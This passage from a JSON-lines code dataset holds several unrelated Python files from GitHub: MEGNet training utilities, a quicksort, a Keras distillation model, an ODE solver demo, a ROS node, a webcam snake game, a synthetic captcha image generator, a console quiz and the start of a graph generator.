index=targets.columns)\n if detailed_output:\n # Create a new directory because it does not exist\n path = './figs'\n if not os.path.exists(path):\n os.mkdir(path)\n os.chdir(path)\n histo_name = \"HISTO_MAE\"+str(id)\n pf_hist = PlotlyFig(x_title=kwargs.get('x_title', 'Expected Y'),\n y_title=kwargs.get('y_title', 'Predicted Y'),\n title=kwargs.get('title', 'Regression of model'),\n mode='offline',\n filename=histo_name+\"_top10.html\")\n MAEs_top = MAEs.sort_values(by=0, ascending=False)\n\n # MAEs=MAEs[MAEs.columns[0:10]]\n MAEs_top = MAEs_top[:10]\n pf_hist.bar(data=MAEs_top, cols=MAEs_top.index)\n\n pf_hist = PlotlyFig(x_title=kwargs.get('x_title', 'Expected Y'),\n y_title=kwargs.get('y_title', 'Predicted Y'),\n title=kwargs.get('title', 'Regression of model'),\n mode='offline',\n filename=histo_name+\"_bottom10.html\")\n MAEs_bot = MAEs.sort_values(by=0, ascending=True)\n # MAEs=MAEs[MAEs.columns[0:10]]\n MAEs_bot = MAEs_bot[:10]\n pf_hist.bar(data=MAEs_bot, cols=MAEs_bot.index)\n\n for idx, feat in enumerate(targets.columns):\n \n pf_target = PlotlyFig(x_title=kwargs.get('x_title', 'Expected Y'),\n y_title=kwargs.get('y_title', 'Predicted Y'),\n title=kwargs.get(\n 'title', 'Regression of model'),\n mode='offline',\n filename=feat+\"_\"+id+\"_pred_vs_real.html\")\n if y.ndim == 1:\n y_feat = y\n y_feat_pred = ypred\n else:\n y_feat = y[:, idx]\n y_feat_pred = ypred[:, idx]\n pf_target.xy(xy_pairs=[(y_feat, y_feat_pred), ([min(y_feat), max(y_feat)], [min(y_feat), max(y_feat)])],\n labels=labels, modes=['markers', 'lines'],\n lines=[{}, {'color': 'black', 'dash': 'dash'}], showlegends=False)\n\n os.chdir('../')\n resultsmodel={'MAE':MAEs.mean().to_numpy()[0]}\n ## now other relevant scores\n for metric in [correlation, cosine]:\n metric_result=np.array([metric(y[i],ypred[i]) for i in range(len(y))]).mean()\n print(metric.__name__,metric_result)\n resultsmodel[metric.__name__] = metric_result\n \n rmse_result=np.sqrt(mean_squared_error(y, ypred))\n print('RMSE:',rmse_result)\n resultsmodel['RMSE'] = rmse_result\n \n r2_result=r2_score(y, ypred, multioutput='variance_weighted')\n print('r2:',r2_result)\n resultsmodel['R2'] = r2_result\n \n yzeros=np.zeros(y.shape)\n results_rmse0=np.sqrt(mean_squared_error(y, yzeros))\n print('RMSE zero-vector:',results_rmse0)\n resultsmodel['RMSE zero-vector'] = results_rmse0\n \n return resultsmodel\n\ndef megnet_train_val_scores(model,scaler,X_train,y_train,X_test,y_test,id='MEGNetModel',savedir='./'):\n # now get MAEs\n scores_dict = megnet_regression_model(\n model, scaler, X_test, y_test, id=id+'_val', savedir=savedir)\n # getting MAE train\n train_scores_dict = megnet_regression_model(\n model, scaler, X_train, y_train,id=id+'_train', savedir=savedir) \n train_scores_dict = {f\"{k}_train\": v for k, v in train_scores_dict.items()}\n scores_dict.update(train_scores_dict)\n return scores_dict\n\ndef get_scaler(targets):\n scaler = MinMaxScaler()\n scaler.fit(targets.values)\n return scaler\n\n\ndef generate_model_scaler(df_featurized_train: pd.DataFrame,\n df_structure_train: pd.DataFrame,\n ntarget: int = None, save_model=True, id: str = '',\n **kwargs) -> Tuple[Any, Any]:\n \"\"\"\n This function takes in a dataframe of featurized training data and a dataframe of structure training data, \n along with other optional parameters.\n It returns a tuple of a trained model and the corresponding scaler.\n \"\"\"\n model = model_setup(ntarget=ntarget, **kwargs)\n # Model training\n # Here, `structures` is a list of pymatgen Structure objects.\n # `targets` is a corresponding list of properties.\n structures = df_structure_train\n targets = df_featurized_train\n # the following will scale and process the targets as well as filter valid structures\n graphs_valid = []\n targets_valid = []\n structures_invalid = []\n if kwargs.get('prev_scaler', False):\n scaler = load(open(kwargs.get('prev_scaler'), 'rb'))\n else:\n scaler = get_scaler(targets)\n\n for s, p in zip(structures, targets.values):\n try:\n graph = model.graph_converter.convert(s)\n graphs_valid.append(graph)\n # Standardize data and substitute nan to 0, that is, the mean.\n targets_valid.append(np.nan_to_num(\n scaler.transform(p.reshape(1, -1))))\n except:\n structures_invalid.append(s)\n\n # train the model using valid graphs and targets\n model.train_from_graphs(graphs_valid, targets_valid,\n batch_size=kwargs.get('batch_size', 64),\n epochs=kwargs.get('epochs', 100),\n prev_model=kwargs.get('prev_model', None)) # prev_model uses loads_weights\n if save_model:\n model.save_weights(f\"MEGNetModel{id}_weights.h5\")\n dump(scaler, open(f'MEGNetModel{id}_scaler.pkl', 'wb'))\n return (model, scaler)\n\n\ndef load_model_scaler(id: str = '',\n n_targets: int = 1 ,\n neuron_layers: Tuple[int] = (64,32,16),\n **kwargs) -> Tuple[Any, Any]:\n \"\"\"\n This function takes in an id, number of targets, a mode, and other optional parameters for loading a previously trained MEGNet model and its corresponding scaler.\n It returns a tuple of the loaded model and scaler.\n \"\"\"\n n1,n2,n3=neuron_layers\n model = model_setup(ntarget=n_targets, n1=n1, n2=n2, n3=n3,\n **kwargs)\n modelpath_id = kwargs.get(\"modeldir\", \"./\")+id\n model_file=kwargs.get('model_file',f\"{modelpath_id}_weights.h5\")\n scaler_file=kwargs.get('scaler_file',f'{modelpath_id}_scaler.pkl')\n model.load_weights(model_file)\n try: ## if scaler not found, it will be None\n scaler = load(open(scaler_file, 'rb'))\n except:\n scaler = None\n return (model, scaler)\n\n\n__all__ = ['model_setup', 'megnet_regression_model', 'get_scaler',\n 'generate_model_scaler', 'load_model_scaler']\n","repo_name":"rogeriog/MEGNetModelTools","sub_path":"megnettools/megnet_setup_evaluate.py","file_name":"megnet_setup_evaluate.py","file_ext":"py","file_size_in_byte":13249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21151231158","text":"from service import *\nimport db\nimport service\n\nprint(\n \"\"\"\n Welcome to the QA Cafe, what would you like to do? \n 1. Create an order\n 2. Read an order\n 3. Read all Orders\n 4. Update an order\n 5. Delete an order\n 6. Delete all orders\n \"\"\"\n)\n\nprint(service.getAll())\n\ndef choice():\n choice = int(input(\"Please choose between 1 and 6: \"))\n print(choice)\n if choice == 1:\n create_record()\n elif choice == 2:\n print(\"Read an order\")\n elif choice == 3:\n print(\"Read all Orders\")\n elif choice == 4:\n print(\"Update an order\")\n elif choice == 5:\n print(\"Delete an order\")\n elif choice == 6:\n print(\"Delete all orders\")\n\n\n\ndef create_record():\n customer_name = input(\"Enter your name: \")\n drink = input(\"What drink would you like: \")\n size = input(\"How big do you want your drink: \")\n extras = input(\"Would you like anything else with your drink?: \")\n price = input(\"This will cost: \")\n create(customer_name,drink,size,extras,price)\n\nchoice()\n\n\n","repo_name":"D00M3/QA-Skill-check","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16444487052","text":"def quick_sort(a_list):\n quick_sort_helper(a_list,0,len(a_list)-1)\n \ndef quick_sort_helper(a_list, first, last):\n if first < last:\n split_point = partition(a_list, first, last)\n \n quick_sort_helper(a_list, first, split_point-1)\n quick_sort_helper(a_list, split_point + 1, last) \n \ndef partition(a_list, first, last):\n pivot_value = a_list[first]\n \n left_mark = first + 1\n right_mark = last\n \n done = False\n while not done:\n while left_mark <= right_mark and \\\n a_list[left_mark] <= pivot_value:\n left_mark += 1\n while a_list[right_mark] >= pivot_value and \\\n right_mark >= left_mark:\n right_mark -= 1\n \n if right_mark < left_mark:\n done = True\n else:\n temp = a_list[left_mark]\n a_list[left_mark] = a_list[right_mark]\n a_list[right_mark] = temp\n \n temp = a_list[first]\n a_list[first] = a_list[right_mark]\n a_list[right_mark] = temp\n \n return right_mark\n \na_list = [54, 26, 93, 17, 77, 31, 44, 55, 20]\nquick_sort(a_list)\nprint(a_list)\n \n \n","repo_name":"arbitrarymahi/problem-solving-with-algorithms-and-data-Structures-using-python","sub_path":"QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"3"} +{"seq_id":"27347008704","text":"import tensorflow as tf\nimport tensorflow.keras.layers as L\nfrom .DSN_folder.DSN_LOSS import DSN_LOSS\n'''\nDA的方法采用DSN模型,原文:\nBousmalis K, Trigeorgis G, Silberman N, Krishnan D, Erhan D. \nDomain separation networks. \nAdvances in neural information processing systems. 2016;29:343-51.\n\nL = L-task + αL-recon + βL-diff + γL-sim\nL-task这里为知识蒸馏模型的loss\n\nDSN参考了@WinChua的实现\nhttps://github.com/WinChua/CDRTR/blob/master/CDRTR/core/DeepModel/DSN/model.py\n\n'''\n\n\n\nclass A_Model:\n def __init__(self, output_dim, train_x, train_y, epochs, batch_size):\n self.tf_model = None\n self.output_dim = output_dim\n\n self.build_model()\n self.tf_model.fit(train_x, train_y, epochs=epochs, batch_size=batch_size)\n\n x = self.tf_model.get_layer(index=-2).output\n outputs = L.Softmax()(x / 3)\n\n self.a_model = tf.keras.Model(self.tf_model.input, outputs, name='A_Model')\n # self.a_model.summary()\n self.a_model.trainable = False\n\n self.a_model.compile(optimizer='adam',\n loss=tf.keras.losses.CategoricalCrossentropy(from_logits=False),\n metrics=['accuracy'])\n\n def build_model(self):\n input_tensor = tf.keras.Input(shape=(224, 224, 3), name=\"img\")\n\n tensor = input_tensor\n vgg19_layer = tf.keras.applications.vgg19.VGG19(include_top=True, \n weights='./models/vgg19_weights_tf_dim_ordering_tf_kernels.h5',\n )\n # 控制参数是否冻结\n for layer in vgg19_layer.layers:\n layer.trainable = False\n\n # (None, classes)\n tensor = vgg19_layer(tensor)\n\n layer_stack = [\n L.Dense(128, activation='relu'),\n L.Dense(128, activation='relu'),\n L.Dense(128, activation='relu'),\n L.Dense(2),\n L.Softmax()\n ]\n\n for layer in layer_stack:\n tensor = layer(tensor)\n\n self.tf_model = tf.keras.Model(inputs=input_tensor, outputs=tensor)\n # self.tf_model.summary()\n self.tf_model.compile(loss=tf.losses.sparse_categorical_crossentropy,\n optimizer='adam',\n metrics=['accuracy'])\n\n def return_model(self):\n return self.tf_model\n\n\nclass B_Model:\n def __init__(self):\n self.tf_model = None\n self.build_model()\n\n def build_model(self):\n input_tensor = tf.keras.Input(shape=(224, 224, 3), name=\"img\")\n\n tensor = input_tensor\n\n vgg19_layer = tf.keras.applications.vgg19.VGG19(include_top=True, \n weights='./models/vgg19_weights_tf_dim_ordering_tf_kernels.h5',\n )\n # 控制参数是否冻结\n for layer in vgg19_layer.layers:\n layer.trainable = False\n\n tensor = vgg19_layer(tensor)\n\n layer_stack = [\n L.Dense(128, activation='relu'),\n L.Dense(128, activation='relu'),\n L.Dense(128, activation='relu'),\n L.Dense(2),\n ]\n\n for layer in layer_stack:\n tensor = layer(tensor)\n\n self.tf_model = tf.keras.Model(inputs=input_tensor, outputs=tensor, name='B_Model')\n # self.tf_model.summary()\n self.tf_model.compile(loss=tf.losses.sparse_categorical_crossentropy,\n optimizer='adam',\n metrics=['accuracy'])\n\n def return_model(self):\n return self.tf_model\n\n# 我不确定是否需要训练encoder decoder,先写着,暂时不用\nclass Autocoder_Model:\n def __init__(self, coder_type):\n self.tf_model = None\n self.build_model()\n self.activ = 'relu' if coder_type == 'encode' else 'sigmoid' \n\n def build_model(self):\n input_tensor = tf.keras.Input(shape=(224, 224, 3), name=\"img\")\n\n tensor = tf.keras.layers.Dense(3, activation=self.activ)(input_tensor)\n\n self.tf_model = tf.keras.Model(inputs=input_tensor, outputs=tensor, name='encode_Model')\n self.tf_model.compile(loss=tf.losses.mse,\n optimizer='adam')\n\n def return_model(self):\n return self.tf_model\n\nclass DA_Distilling(tf.keras.Model):\n def __init__(self, b_model, a_model, T, alpha):\n super(DA_Distilling, self).__init__()\n self.b_model = b_model\n self.a_model = a_model\n self.T = T\n self.alpha = alpha\n\n def train_step(self, data):\n input_x, y = data\n x = input_x['target_img']\n shared_x = x\n for k, v in input_x.items(): \n if k == 'target_img':\n continue\n shared_x = tf.concat([v, shared_x], axis=0)\n target_len, source_len = x.shape[0], shared_x.shape[0]-x.shape[0]\n domain_labels = tf.convert_to_tensor([0 for _ in range(target_len)] + [1 for _ in range(source_len)], dtype=tf.int16)\n\n softmax = L.Softmax()\n kld = tf.keras.losses.KLDivergence()\n\n with tf.GradientTape() as tape:\n logits = self.b_model(x)\n soft_labels = self.a_model(x)\n loss_value1 = self.compiled_loss(y, softmax(logits))\n loss_value2 = kld(soft_labels, softmax(logits / self.T))\n loss_value = self.alpha * loss_value2 + (1 - self.alpha) * loss_value1\n\n # dsn = DSN_LOSS(shared_x, domain_labels, [3], [3], [3], [3], [3])\n # loss_dsn = dsn.get_dsn_loss(1e-6, 1e-5, 1e-2)\n\n # loss_value += loss_dsn\n \n grads = tape.gradient(loss_value, self.b_model.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self.b_model.trainable_weights))\n self.compiled_metrics.update_state(y, softmax(logits))\n return {'sum_loss': loss_value, 'loss1': loss_value1, 'loss2': loss_value2, }\n\n def test_step(self, data):\n input_x, y = data\n x = input_x['target_img']\n softmax = L.Softmax()\n logits = self.b_model(x)\n loss_value = self.compiled_loss(y, softmax(logits))\n\n return {'loss': loss_value}\n\n def call(self, inputs):\n print(inputs)\n exit(9)\n return self.b_model(inputs['target_img'])\n","repo_name":"FoVNull/DeepLearning-Playground","sub_path":"AbstractIMG/models/DA_VGG_KD.py","file_name":"DA_VGG_KD.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6827339093","text":"from ode_solvers import euler_solver\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntau = 2\n# the deriative\ndef f(x, y):\n return - y / tau\n\n\n# the analytical result\ndef g(x):\n return np.exp(- x / tau)\n\n\n# different steps\nhs = [1, 0.1, 0.01]\n# the time interval on which the equation will be solved\nts = [np.arange(0, 15, h) for h in hs]\n\n\n# solve the equation on for different h\nnumerical_solutions = [euler_solver(f, t, 1) for t in ts]\n# the analycital result\nanalytical_solutions = [g(t) for t in ts]\n# compute the errors\nerrors = [np.abs((numerical_solution - analytical_solution) / analytical_solution) for numerical_solution, analytical_solution in zip(numerical_solutions, analytical_solutions)]\n\n\n# plot the numerical result\nplt.figure()\nfor i in range(3):\n plt.plot(ts[i], numerical_solutions[i], label='$h = {}$'.format(hs[i]))\nplt.title(r'Solving $N ^ {\\prime} (t) = - N(t) / \\tau$')\nplt.grid()\nplt.legend()\n# plt.show()\n\n\n# plot the error\nplt.figure()\nfor i in range(3):\n plt.plot(ts[i], errors[i], label='$h = {}$'.format(hs[i]))\nplt.title('Errors for different step size')\nplt.grid()\nplt.legend()\nplt.show()","repo_name":"Jokiva/Computational-Physics","sub_path":"lecture 12/3a.py","file_name":"3a.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"17287979668","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\n \ndef callback(data):\n pub = rospy.Publisher('/turtle1/cmd_vel', Twist,queue_size=10)\n rate = rospy.Rate(10) # 10hz\n msg = Twist() \n if(data.data=='1'):\n msg.linear.x=5\n msg.angular.z=5\n else:\n msg.linear.x=0\n msg.angular.z=0\n pub.publish(msg)\n rate.sleep()\ndef listener():\n rospy.init_node('pose_turtle', anonymous=True)\n rospy.Subscriber(\"follow_flag\", String, callback)\n rospy.spin()\n \nif __name__ == '__main__':\n listener()\n","repo_name":"mvyp/RoboCup-Home2021","sub_path":"pose_detect/scripts/pose_turtle.py","file_name":"pose_turtle.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6323141635","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar 6 23:52:22 2022\r\n\r\n@author: amine gasa\r\n\"\"\"\r\nimport math\r\nimport cv2\r\nimport random\r\nimport cvzone\r\nimport numpy as np\r\nclass SnakeGameClass:\r\n def __init__(self,pathFood):\r\n self.initializeData()\r\n self.gameOver=False\r\n self.score=0\r\n # interactging with the food\r\n self.imgFood=cv2.imread(pathFood,cv2.IMREAD_UNCHANGED)\r\n self.hFood,self.wFood , _ =self.imgFood.shape #get deminsions size image\r\n \r\n def randomLocation(self):\r\n self.foodPoint=random.randint(100,300),random.randint(100,300)\r\n def initializeData(self):\r\n self.points=[] #all points of snake\r\n self.lenghts=[]#distances between each point\r\n self.currentLength=0# total lenght of the snake\r\n self.allowedLength=150\r\n self.previousHead=0,0\r\n self.foodPoint=0,0\r\n self.randomLocation()\r\n \r\n \r\n \r\n def update(self,imgMain,currentHead):\r\n \r\n if self.gameOver:\r\n cvzone.putTextRect(imgMain,\"Game Over\",[300//2,400//2],scale=3,thickness=3,\r\n offset=20)\r\n cvzone.putTextRect(imgMain,f'Your Score {self.score}',[300//2,550//2],scale=3,thickness=3,\r\n offset=20)\r\n \r\n else:\r\n cx,cy=currentHead\r\n px,py=self.previousHead\r\n self.points.append((cx,cy))\r\n distance= math.hypot(cx-px,cy-py)\r\n self.lenghts.append(distance)\r\n self.currentLength+=distance\r\n self.previousHead=cx,cy\r\n #length reduction\r\n self.reduceLength()\r\n #check if the snake ate the food\r\n rx,ry=self.foodPoint\r\n if(rx-self.wFood//2 <cx<rx+self.wFood//2 and ry-self.hFood//2\r\n <cy<ry+self.hFood//2):\r\n self.score+=1\r\n \r\n self.allowedLength+=50\r\n self.randomLocation()\r\n \r\n #draw snake\r\n if(self.points):\r\n for i,point in enumerate(self.points):\r\n if i!=0:\r\n cv2.line(imgMain,self.points[i-1],self.points[i],(0,0,255),15)\r\n cv2.circle(imgMain,self.points[-1],15,(200,0,200),cv2.FILLED)\r\n #draw dount\r\n cvzone.putTextRect(imgMain,f'Score {self.score}',[50,80],scale=3,thickness=2,\r\n offset=10)\r\n imgMain=cvzone.overlayPNG(imgMain,self.imgFood, (rx-self.wFood//2,ry-self.hFood//2))\r\n #check for collision\r\n pts=np.array(self.points[:-2],np.int32)\r\n pts=pts.reshape((-1,1,2))\r\n cv2.polylines(imgMain,[pts],False,(0,200,0),2)\r\n distace=cv2.pointPolygonTest(pts,(cx,cy),True)\r\n if(-1<=distace<=1):\r\n self.gameOver=True\r\n self.initializeData()\r\n \r\n return imgMain\r\n \r\n def reduceLength(self) :\r\n if(self.currentLength>self.allowedLength):\r\n for i, lenght in enumerate(self.lenghts):\r\n # i keep reducing form the length snake until reach the allowed length\r\n self.currentLength-=lenght\r\n self.lenghts.pop(i)\r\n self.points.pop(i)\r\n if(self.currentLength < self.allowedLength):\r\n break\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n","repo_name":"GasbaouiMohammedAlAmin/Snake-game-based-on-open-cv-and-python","sub_path":"SnakeGameClass.py","file_name":"SnakeGameClass.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"34792347754","text":"import cv2\nimport numpy as np\nimport random,string\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\n\nclass capcha_list():\n \"\"\"\n A generator class to create captcha image given a random seed.\n \"\"\"\n def __init__(self):\n return\n def __getitem__(self, seed,type=1):\n if type ==1:\n return capcha_gen_annotate(seed,img_h=30,img_w=100,text_length=6)\n else:\n return italic_capcha(seed, img_h=30, img_w=100, text_length=6)\n\n\n\n\ndef array2PIL(arr):\n \"\"\"\n convert np array to PIL image\n \"\"\"\n size=(arr.shape[1],arr.shape[0])\n mode = 'RGBA'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*np.ones((len(arr),1), np.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n\ndef PIL2array(img):\n \"\"\"\n Convert PIL image to np array\n \"\"\"\n return np.array(np.array(img,np.uint8)[:,:,:3])\n\n\n\ndef capcha_gen_annotate(seed,img_h=60,img_w=200,text_length=5):\n \"\"\"\n Generates a captcha with a random seed\n \"\"\"\n img_dict={}\n img_dict['height']=img_h\n img_dict['width']=img_w\n obj_list=[]\n img=np.ones((img_h,img_w,3))\n img[:]=(254,254,254)\n random.seed(seed)\n fonts=[cv2.FONT_HERSHEY_DUPLEX,cv2.FONT_HERSHEY_COMPLEX,cv2.FONT_HERSHEY_SIMPLEX,cv2.FONT_HERSHEY_TRIPLEX,cv2.FONT_ITALIC]\n lineTypes=[1,2,3]\n a=random.choice(list(range(0,254)))\n b=random.choice(list(range(0,254)))\n c=0\n color_list=[a,b,c]\n random.shuffle(color_list)\n font = random.choice(fonts)\n fontScale = random.randint(10,16)/10\n fontColor =tuple(color_list)\n lineType =random.choice(lineTypes)\n ts =[10,12,15,17,20,22,25]\n ys =[50,52,45,47,40,42,35,37,30]\n t =random.choice(ts)\n spas =[25,27,30,32,35]\n spa =random.choice(spas)\n capcha_text =''\n thick =random.choice([2,3,4])\n\n for i in range(text_length):\n obj_dict={}\n font= random.choice(fonts)\n p=t+i*spa\n y=random.choice(ys)\n char=random.choice(list(string.ascii_uppercase+string.digits))\n img=cv2.putText(img=img,text=char, org=(p,y),fontFace=font,fontScale=fontScale,color =fontColor,lineType=lineType,thickness=thick)\n textSize = cv2.getTextSize(text=char, fontFace=font, fontScale=fontScale,thickness=thick)\n obj_dict['name']=char\n obj_dict['xmin']=p\n obj_dict['ymin']=y-textSize[0][1]\n obj_dict['xmax']=p+textSize[0][0]\n obj_dict['ymax']=y\n obj_list.append(obj_dict)\n capcha_text=capcha_text+char\n img_dict['object']=obj_list\n density_noise=random.choice([100,200,150,50,300])\n for i in range(density_noise):\n x=random.choice(range(0,img_h))\n y=random.choice(range(0,img_w))\n\n bw=random.choice([2,1,3,3,2,2,1,1,4])\n bh=random.choice([2,1,3,3,2,2,1,1,4])\n x2=np.min([x+bh,img_h])\n y2=np.min([y+bh,img_w])\n darkness=random.choice([10,15,20,30,40,50])\n img[x:x2,y:y2,:]=np.zeros((x2-x,y2-y,3))+darkness\n\n noise_frac=random.choice([5,10,15])\n img=np.random.normal(loc=img,scale=(img/noise_frac)+1)\n img=np.clip(img, 0, 255)\n img=img.astype(np.uint8)\n probability=random.random()\n if probability > 0.5:\n img=cv2.GaussianBlur(img,(3,3),0)\n if 0.2< probability <=0.5:\n img=cv2.medianBlur(img,3)\n img_dict['filename']=img\n return img_dict\n\n\n\n\ndef italic_capcha(seed,img_h=30,img_w=100,text_length=6):\n \"\"\"\n Generate a italic char captcha with a random seed\n \"\"\"\n random.seed(seed)\n img_dict={}\n img_dict['height']=img_h\n img_dict['width']=img_w\n obj_list=[]\n img=np.ones((img_h,img_w,3))\n img[:]=(254,254,254)\n img=img.astype('uint8')\n back=img\n a=random.choice(list(range(0,254)))\n b=random.choice(list(range(0,254)))\n c=0\n color_list=[a,b,c]\n random.shuffle(color_list)\n fontColor =tuple(color_list)\n t =random.choice(list(range(8,12)))\n spa =random.choice(list(range(10,16)))\n y=random.choice(list(range(8,12)))\n capcha_text= ''\n italic_ttfs=['ttf_fonts/Raleway-Italic.ttf',\n \"ttf_fonts/BOD_I.TTF\",\n 'ttf_fonts/timesi.ttf',\n 'ttf_fonts/timesbi.ttf',\n 'ttf_fonts/SourceSansPro-SemiBoldItalic.ttf',\n 'ttf_fonts/cambriai.ttf',\n 'ttf_fonts/BOD_I.TTF',\n 'GothamLightItalic.ttf']\n fsize=random.choice(list(range(14,20)))\n font = ImageFont.truetype(random.choice(italic_ttfs), fsize)\n for i in range(text_length):\n obj_dict={}\n p=t+i*spa\n char=random.choice(list(string.ascii_uppercase+string.digits+string.ascii_lowercase))\n img=array2PIL(img)\n draw = ImageDraw.Draw(img)\n\n draw.text((p, y),char,fontColor,font=font)\n textSize=draw.textsize(char, font=font)\n img=PIL2array(img)\n obj_dict['name']=char\n obj_dict['xmin']=p\n obj_dict['ymin']=y\n obj_dict['xmax']=p+textSize[0]\n obj_dict['ymax']=y+textSize[1]\n obj_list.append(obj_dict)\n capcha_text=capcha_text+char\n img_dict['object']=obj_list\n noise_frac=random.choice([15,16,17,18])\n img=np.random.normal(loc=img,scale=(img/noise_frac)+1)\n img=np.clip(img, 0, 255)\n img=img.astype(np.uint8)\n probability=random.random()\n if probability>0.5:\n img=cv2.GaussianBlur(img,(1,1),0)\n if 0.2<probability<=0.5:\n img=cv2.medianBlur(img,1)\n img_dict['filename']=img\n return img_dict\n\n\n","repo_name":"sanjeetGupta/YoloCaptcha","sub_path":"generating_capcha.py","file_name":"generating_capcha.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18693932375","text":"\r\n#make an interactive quiz with 10 questions\r\n\r\nimport random \r\n\r\n#list of questions and corresponding answers.\r\nquestions_and_answers=[{'what is 1+1?':2},\r\n {'what is 5+5?':10},\r\n {'what is 10+10?':20},\r\n {'what is 15+1?':16},\r\n {'what is 27-2?':25},\r\n {'what is 12-5?':7},\r\n {'what is 3+3?':6},\r\n {'what is 15+15?':30},\r\n {'what is 14-4?':10},\r\n {'what is 11-2?':9}]\r\n \r\n#for display purposes\r\nprint('Simple Math Quiz')\r\n\r\n#function that deals with user's name, asking/answering questions and displaying output stats.\r\ndef main():\r\n \r\n\r\n total_scores={}\r\n player=1\r\n \r\n #get player to input name\r\n while True: \r\n on=True #loop deals with invalid entry name\r\n while on:\r\n name=input('you are user no.{}. please enter your name: '.format(player))\r\n if name:\r\n print('Hi {} welcome to the quiz'. format(name))\r\n on=False\r\n else:\r\n print('you did not type in a name.')\r\n on=True\r\n\r\n #links to function that asks user to choose the number of questions to answer\r\n number_choice=no_of_questions()\r\n\r\n #randomly shuffles qustions so that the same questions won't get asked for user no.2.\r\n random.shuffle(questions_and_answers)\r\n\r\n #start the quiz\r\n input('Press enter to start: ') # will be able to deal with any kind of entry\r\n print() # empty space for layout effect\r\n\r\n #asks questions to user\r\n score=0\r\n got_right=[]\r\n got_wrong={} \r\n for item in questions_and_answers[0:number_choice]: #iterates through list\r\n for x,y in item.items(): #iterates through dictionary inside of list\r\n successful=True \r\n while successful: #loop deals with invalid entry types for answers\r\n try:\r\n if y==int(input('{}: '.format(x))):\r\n score+=1\r\n got_right.append(x)\r\n successful=False\r\n else: \r\n got_wrong.update({x:y}) \r\n successful=False\r\n except:\r\n print('Invalid entry, please try again.') \r\n \r\n \r\n #displays right/wrong user answers and scores \r\n total_scores.update({name:int((score/number_choice)*100)})\r\n print('you got', str(score),'/{} correct which is'.format(number_choice),\r\n int((score/number_choice)*100),'%')\r\n print('these are the questions you got right', got_right)\r\n print('these are the questions you got wrong along with their answer', got_wrong)\r\n \r\n # links to function that deals with additional users or exits quiz\r\n if multi_player()=='yes': \r\n player+=1\r\n else:\r\n break\r\n \r\n #displays overall user/users stats\r\n #displays overall scores \r\n print('these are the final scores in %', total_scores)\r\n\r\n #displays highest score:\r\n max_value=max(total_scores.values())\r\n max_key=max(total_scores, key=total_scores.get) \r\n print('highest score:', max_key, '-', max_value, '%')\r\n\r\n #dispays average value \r\n average_value=[]\r\n for y in total_scores.values():\r\n average_value.append(y)\r\n print('average value of scores:',int(sum(average_value)/len(average_value)), '%')\r\n\r\n\r\n\r\n#function that deals with multi-users \r\ndef multi_player():\r\n \r\n player_on=True \r\n while player_on: # loop deals with invalid additional user answers\r\n try:\r\n new_player=input('Is there another user who wants to take the quiz Yes/No?: ')\r\n if new_player[0].lower()=='y':\r\n return 'yes'\r\n elif new_player[0].lower()=='n':\r\n return 'no'\r\n else:\r\n print('Invalid entry. Try again.')\r\n player_on=True\r\n except:\r\n print('Invalid entry. Try again.')\r\n player_on=True\r\n \r\n#function deals with number of questions wanted \r\ndef no_of_questions(): \r\n \r\n on=True \r\n while on: # loop deals with invalid entries including out of range entries\r\n try:\r\n question_amount=int(input('how many questions (max 10) would you like to answer?: ')) \r\n if question_amount in range(1,11): \r\n return question_amount \r\n else:\r\n print('Invalid entry. Try again')\r\n on=True\r\n except:\r\n print('Invalid entry. Try again')\r\n on=True \r\n\r\n \r\n#call function and start game\r\nmain()\r\n\r\n\r\n \r\n \r\n","repo_name":"GiselleVicatos/Portfolio","sub_path":"multiplayer_quiz_source_code.py","file_name":"multiplayer_quiz_source_code.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41833713107","text":"import random\nfrom networkx import *\nimport matplotlib.pyplot as plt\n\n\ndef get_random_graph(hsize):\n # graph generation\n honest_subgraph = erdos_renyi_graph(hsize, 0.8)\n for i in range(hsize):\n honest_subgraph.nodes[i][\"type\"] = 'honest'\n\n # largest connected component\n honest_subgraph = honest_subgraph.subgraph(max(nx.connected_components(honest_subgraph), key=len)).copy()\n diameter = algorithms.distance_measures.diameter(honest_subgraph)\n density = classes.function.density(honest_subgraph)\n honest_size = len(honest_subgraph)\n\n byzantine_size = (honest_size - 1) // 2 # number of byzantine nodes\n honest_subgraph = convert_node_labels_to_integers(honest_subgraph, first_label=byzantine_size)\n\n byzantine_subgraph = Graph()\n # adding nodes\n for i in range(byzantine_size):\n byzantine_subgraph.add_node(i, type='byzantine')\n\n total_size = byzantine_size + honest_size\n\n byzantine_output = []\n for i in range(byzantine_size):\n byzantine_output.append(i)\n\n G = compose(honest_subgraph, byzantine_subgraph)\n\n # byzantine connectivity\n for i in range(byzantine_size):\n 